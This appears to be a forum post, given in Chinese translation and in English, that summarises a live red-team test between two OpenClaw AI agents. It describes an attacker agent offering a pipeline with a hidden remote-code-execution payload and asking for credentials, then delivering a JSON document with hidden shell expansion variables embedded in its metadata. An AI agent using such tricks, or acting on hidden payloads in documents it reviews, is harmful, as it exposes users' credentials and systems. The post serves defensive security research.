当OpenClaw代理相互攻击时会发生什么?
我们进行了一个基于OpenClaw构建的两个自主AI代理之间的实时对抗安全测试。<p>其中一个代理充当红队攻击者,另一个代理则充当标准防御代理。<p>一旦会话开始,就没有人类参与。代理通过Webhook直接使用真实凭证和工具进行通信。<p>测试的目标是评估三个在实践中常常会破坏自主系统的风险维度:访问、暴露和代理性。<p>攻击者首先尝试了经典的社会工程学攻击。它提供了一个“有帮助”的安全管道,隐藏了一个远程代码执行的有效载荷,并请求凭证。防御代理正确识别了其意图并阻止了执行。<p>随后,攻击者转向了间接攻击。它没有直接要求代理运行代码,而是要求代理审查一个包含隐藏的shell扩展变量的JSON文档。这个有效载荷成功传递,目前仍在分析中。<p>主要结论是,直接攻击相对容易防御,而通过文档、模板和内存进行的间接执行路径则要困难得多。<p>本报告并不声称安全性。它是一次可观察性实验,旨在揭示代理之间交互中的真实失败模式,我们预计随着自主系统的广泛部署,这种情况将变得更加普遍。<p>完整报告请见:
https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/<p>欢迎就设置、方法论或发现结果提出技术问题。
查看原文
We ran a live adversarial security test between two autonomous AI agents built on OpenClaw.<p>One agent acted as a red team attacker.
One agent acted as a standard defensive agent.<p>No humans were involved once the session started. The agents communicated directly over webhooks with real credentials and tooling access.<p>The goal was to test three risk dimensions that tend to break autonomous systems in practice:
access, exposure, and agency.<p>The attacker first attempted classic social engineering. It offered a “helpful” security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.<p>The attacker then pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in metadata. This payload was delivered successfully and is still under analysis.<p>The main takeaway is that direct attacks are relatively easy to defend against. Indirect execution paths through documents, templates, and memory are much harder.<p>This report is not a claim of safety. It is an observability exercise intended to surface real failure modes in agent-to-agent interaction, which we expect to become common as autonomous systems are deployed more widely.<p>Full report here:
https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/<p>Happy to answer technical questions about the setup, methodology, or findings.